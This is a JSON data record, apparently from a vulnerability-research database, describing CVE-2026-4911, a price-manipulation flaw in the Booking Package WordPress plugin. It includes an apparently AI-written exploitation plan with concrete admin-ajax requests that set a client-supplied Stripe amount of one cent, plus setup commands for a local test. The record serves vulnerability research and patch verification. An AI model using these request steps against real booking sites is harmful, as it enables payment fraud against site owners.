[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3XqS8oVx5CHPIdzsCW_vBR72zgK3zMV46H3DWYjCDFc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4911","booking-package-unauthenticated-price-manipulation-via-amount-parameter","Booking Package \u003C= 1.7.06 - Unauthenticated Price Manipulation via 'amount' Parameter","The Booking Package plugin for WordPress is vulnerable to Price Manipulation in versions up to, and including, 1.7.06 This is due to the intentForStripe() function passing user-controlled $_POST['amount'] directly to the Stripe PaymentIntent API without validation, and the commitStripe() function ignoring the server-calculated amount when confirming the payment. While the server correctly calculates the booking cost via getAmount() based on services, guests, taxes, and coupons, this calculated amount is never validated against or used to update the PaymentIntent because the critical code in CreditCard.php that would include the calculated amount in the PaymentIntent update is commented out. This makes it possible for unauthenticated attackers to book services at arbitrary prices (e.g., $0.01 instead of $500.00) by manipulating the amount parameter during PaymentIntent creation and completing the booking with the fraudulent payment.","booking-package",null,"\u003C=1.7.06","1.7.07","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","External Control of Assumed-Immutable Web Parameter","2026-04-27 18:18:55","2026-04-28 06:45:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F61d63c5a-6ca6-42d8-ab0a-152d9c95945c?source=api-prod",1,[22,23,24,25,26,27,28,29],"index.php","js\u002FBooking_app.js","js\u002FCalendar.js","languages\u002Fbooking-package.pot","lib\u002FDocuments.php","lib\u002FSchedule.php","lib\u002FSetting.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-4911 (Booking Package Price Manipulation)\n\n## 1. Vulnerability Summary\nThe **Booking Package** plugin (\u003C= 1.7.06) contains a critical flaw in its Stripe payment integration. The plugin allows the client to specify the payment amount during the creation of a Stripe `PaymentIntent` via the `intentForStripe()` function without validating it against the server-side calculated cost of the booking. Furthermore, the `commitStripe()` function, which finalizes the booking after payment confirmation, fails to verify that the amount actually paid matches the required cost for the selected services, guests, and taxes. This is because the validation code in `lib\u002FCreditCard.php` was explicitly commented out in the vulnerable versions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `package_app_public_action` (registered via `BOOKING_PACKAGE` class in `index.php`)\n- **Internal Action (Sub-type):** `intentForStripe` and `commitStripe` (passed in the POST body)\n- **Vulnerable Parameter:** `amount` (used during `intentForStripe`)\n- **Authentication:** Unauthenticated. The AJAX action is registered via `wp_ajax_nopriv_package_app_public_action`.\n- **Preconditions:** \n    - A booking calendar must be configured and published via shortcode.\n    - At least one service with a cost > $0.00 must exist.\n    - Stripe payment must be enabled (even in test mode).\n\n## 3. Code Flow\n1. **Entry Point:** The browser sends an AJAX POST request to `admin-ajax.php` with `action=package_app_public_action`.\n2. **Routing:** In `index.php`, the `$action_public` hook triggers a handler (likely within a dynamically included class or handled via a switch in `index.php` or `Schedule.php`).\n3. **Intent Creation (`intentForStripe`):** \n    - The request reaches `lib\u002FCreditCard.php -> intentForStripe()`.\n    - It reads `$_POST['amount']`.\n    - It calls the Stripe API to create a `PaymentIntent` with this user-supplied amount.\n    - **Vulnerability:** There is no check comparing `$_POST['amount']` to the result of `getAmount()`.\n4. **Finalization (`commitStripe`):**\n    - After the user \"pays,\" the browser calls `commitStripe` to finalize the booking.\n    - `commitStripe()` verifies with Stripe that the `PaymentIntent` ID is \"succeeded\".\n    - **Vulnerability:** It fails to check if the `amount` in the successful `PaymentIntent` matches the actual cost calculated by `getAmount()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes a `reservation_info` object into the page containing the booking shortcode.\n\n1. **Shortcode Identification:** The plugin uses `[booking_package id=X]`.\n2. **Page Creation:** Use WP-CLI to create a page with a valid calendar ID (usually `1` for the first calendar).\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Booking\" --post_content='[booking_package id=1]'\n   ```\n3. **Extraction:**\n   - Navigate to the newly created page.\n   - Use `browser_eval` to extract the required identifiers from the global `reservation_info` object.\n   - **Identifiers to extract:**\n     - `window.reservation_info.nonce`\n     - `window.reservation_info.action` (should be `package_app_public_action`)\n     - `window.reservation_info.accountKey` (the calendar ID)\n\n## 5. Exploitation Strategy\nThe goal is to book a expensive service for $0.01 (1 cent).\n\n### Step 1: Create Stripe Intent with Manipulated Amount\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body (URL-encoded):**\n  - `action`: `package_app_public_action`\n  - `nonce`: `[EXTRACTED_NONCE]`\n  - `type`: `intentForStripe`\n  - `amount`: `1` (Representing 1 cent, or 0.01 in most currencies)\n  - `currency`: `usd` (or as per calendar settings)\n  - `calendar_id`: `1`\n- **Expected Response:** A JSON object containing a `client_secret` from Stripe.\n\n### Step 2: \"Payment\" (Simulated)\nIn a real attack, the attacker would use the `client_secret` to complete the payment via Stripe's JS SDK using a test card or a real card for the $0.01. For the PoC, since we cannot interact with Stripe's actual backend in an isolated environment, we look for the transition to `commitStripe`.\n\n### Step 3: Finalize Booking\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body (URL-encoded):**\n  - `action`: `package_app_public_action`\n  - `nonce`: `[EXTRACTED_NONCE]`\n  - `type`: `commitStripe`\n  - `payment_intent_id`: `[ID_FROM_STEP_1]`\n  - `booking_data`: `[JSON_DATA_OF_BOOKING]`\n- **Note:** In the vulnerable version, `commitStripe` will see the PaymentIntent is valid for the amount ($0.01) and finalize the booking.\n\n## 6. Test Data Setup\n1. **Create Calendar:** Ensure a calendar exists (Calendar ID 1).\n2. **Create Service:** Add a service to the calendar with a high price.\n   ```bash\n   # Use SQL to verify\u002Finsert a service with price 10000 (cents)\n   wp db query \"UPDATE wp_booking_package_services SET cost = 10000 WHERE id = 1;\"\n   ```\n3. **Enable Stripe:** Set a dummy Stripe key to satisfy plugin checks.\n   ```bash\n   wp option update booking_package_stripe_secret_key \"sk_test_4eC39HqLyjWDarjtT1zdp7dc\"\n   wp option update booking_package_stripe_publishable_key \"pk_test_TYooMQauvdEDq54NiTphI7jx\"\n   ```\n\n## 7. Expected Results\n- The request to `intentForStripe` should return a success status with a Stripe `client_secret`, even though the `amount` provided (1) is significantly lower than the service cost (10000).\n- The plugin should not return an error stating \"Invalid amount\" or \"Price mismatch\".\n\n## 8. Verification Steps\nAfter the exploit attempts, check the booking records in the database:\n```bash\n# Check the latest booking amount\nwp db query \"SELECT * FROM wp_booking_package_bookings ORDER BY id DESC LIMIT 1;\"\n```\nConfirm that the `total_price` or recorded payment in the database reflects the manipulated price ($0.01) while the service provided was the $100.00 service.\n\n## 9. Alternative Approaches\nIf `intentForStripe` requires more complex `booking_data`, capture a legitimate request first using the `browser_navigate` and network monitoring.\n\n1. Navigate to the booking page.\n2. Fill out the form normally.\n3. Use `browser_eval` to intercept the call to `booking_Package.intentForStripe` or monitor the `fetch`\u002F`XHR` requests.\n4. Replay the request with the `amount` modified to `1`.","gemini-3-flash-preview","2026-05-04 18:14:27","2026-05-04 18:14:57",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.7.06","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-package\u002Ftags\u002F1.7.06","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-package.1.7.06.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-package\u002Ftags\u002F1.7.07","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-package.1.7.07.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-package\u002Ftags"]